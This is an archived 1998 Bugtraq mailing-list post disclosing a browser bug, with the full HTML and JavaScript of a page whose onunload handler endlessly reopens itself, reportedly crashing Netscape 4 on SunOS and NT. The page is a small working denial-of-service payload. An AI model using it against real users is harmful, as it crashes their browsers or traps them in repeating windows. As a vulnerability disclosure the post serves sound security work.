Bugtraq mailing list archives

Re: More browser bugs.


From: panzer () DHP COM (Matt Drown)
Date: Sat, 28 Mar 1998 03:34:25 GMT


Perhaps there needs to a bugtraq-browsers, or a bugtraq-javascript....
www.dhp.com/~panzer/evil.html crashes netscape4 on SunOS and NT without a
problem.  IE4 deals properly.


<html><head>
<title> Evil </title>
<script language="JavaScript">
 var exit=true;
 function xit()
 {
 if (exit)
 open("http://www.dhp.com/~panzer/evil.html","DisplayWindow","width=50,height=20";);
 }
</script>
</head>
<body onunload="xit()">
<blink>Evil</blink>
</body>

I don't know javascript, I'm just pasting things together after being
annoyed with banner advertisements that didn't go away.  When I figured
out what they were doing, I tried this.
--
-Matt Drown     -- Privacy, Anonyminity, & Security -- DataHaven Project
 panzer () dhp com -- Shell and Web accounts           -- http://www.dhp.com/



Current thread: